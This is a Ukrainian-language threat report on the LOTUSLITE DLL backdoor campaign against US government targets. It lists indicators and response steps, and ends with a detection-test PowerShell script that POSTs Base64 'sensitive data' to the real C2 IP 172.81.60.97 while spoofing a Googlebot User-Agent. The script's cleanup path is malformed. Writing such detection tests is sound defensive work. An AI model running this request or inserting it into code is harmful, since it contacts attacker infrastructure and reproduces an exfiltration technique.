Кампанія LOTUSLITE: Цільовий шпіонаж, керований геополітичними наративами

Резюме

Acronis TRU спостерігало цільову шпигунську операцію, спрямовану на організації уряду США, яка доставила зловмисний DLL бекдор, LOTUSLITE, всередині ZIP-архіву на політичну тематику. Допоміжний завантажувач виконує підключення DLL, після чого бекдор передає сигнали на заздалегідь зумовлену C2 точку через HTTPS, імітуючи користувача Googlebot. Оператори встановлюють стійкість, створюючи окремий каталог ProgramData і додаючи запис Run у реєстрі. На основі технік, які використовувалися, діяльність була пов’язана з Mustang Panda.

Розслідування

Аналітики розпакували ZIP і ідентифікували бінарий завантажувач (Maduro to be taken to New York.exe) разом зі зловмисним DLL (kugou.dll). Аналіз задокументував потік sideloading DLL, поведінку бекдор, використання мутексів та точні артефакти стійкості, створені на хості. Перегляд інфраструктури приписав комунікації до єдиного IP (172.81.60.97) та домену, розміщеного на spryt.net, нібито розміщеного в Фініксі, Арізона. Приписання до Mustang Panda було оцінено з помірною впевненістю через спільні тактики та шаблони інфраструктури.

Зменшення ризиків

Виявлення Acronis спиралися на хеші SHA-256 для зловмисних бінарний і висвітлили специфічну папку стійкості ProgramData та місце запису ключа Run. Мережеві контролі повинні позначати вихідні HTTPS-з’єднання з визначеним IP/доменом, коли вони поєднуються з рядком користувача Googlebot. Зменшіть стійкість шляхом запобігання виконанню невідомих бінарний з ProgramData і видалення відповідного запису Run з реєстру при виявленні.

Реакція

Негайно ізолюйте постраждалі кінцеві точки, зберіть вольативні дані та збережіть зловмисний бінар для аналізу. Видаліть створену папку ProgramData та видаліть відповідне значення запису Run, щоб порушити стійкість. Заблокуйте з’єднання з C2 IP та доменом, і оновіть виявлення кінцевих точок з наданими хешами файлів та індикатором мутекса. Нарешті, проведіть пошук по всьому середовищу для додаткових хостів, які демонструють ті ж підписи завантажувача та DLL.

Виконання моделювання

Попередня умова: Перевірка телеметрії та базової лінії повинна бути пройдена.

Мотивування: У цьому розділі детально описується точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та розповідь МАЮТЬ прямо відображати виявлені TTP і повинні генерувати точну телеметрію, очікувану логікою виявлення.

• Розповідь про атаку та команди:
  Атакувальник захопив робочу станцію та встановив бекдор LOTUSLITE. Щоб захопити дані, зливаючись із легітимним веб‑трафіком, бекдор видає HTTP POST на заздалегідь зумовлений C2 сервер 172.81.60.97. Він чітко встановлює Заголовок User‑Agent до “Googlebot”, щоб маскуватися під павука пошукової системи, сподіваючись прослизнути повз захисту периметра, який допускає таких агентів. Навантаження містить дані, закодовані в Base64.

• Скрипт регресійного тестування:

  # Імітація C2 LOTUSLITE – powershell
  $c2 = "http://172.81.60.97/receive"
  $ua = "Googlebot"
  $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
  $body = @{ "data" = $data }
  
  try {
      Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
      Write-Host "C2 запит успішно надіслано."
  } catch {
      Write-Error "C2 запит не вдався: $_"
  }

• Команди очищення:

  # Видаліть будь-які тимчасові файли або залишкові мережеві з'єднання
  Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue
  # (Жодних постійних сервісів не було створено під час цієї симуляції)
  Write-Host "Очищення завершено."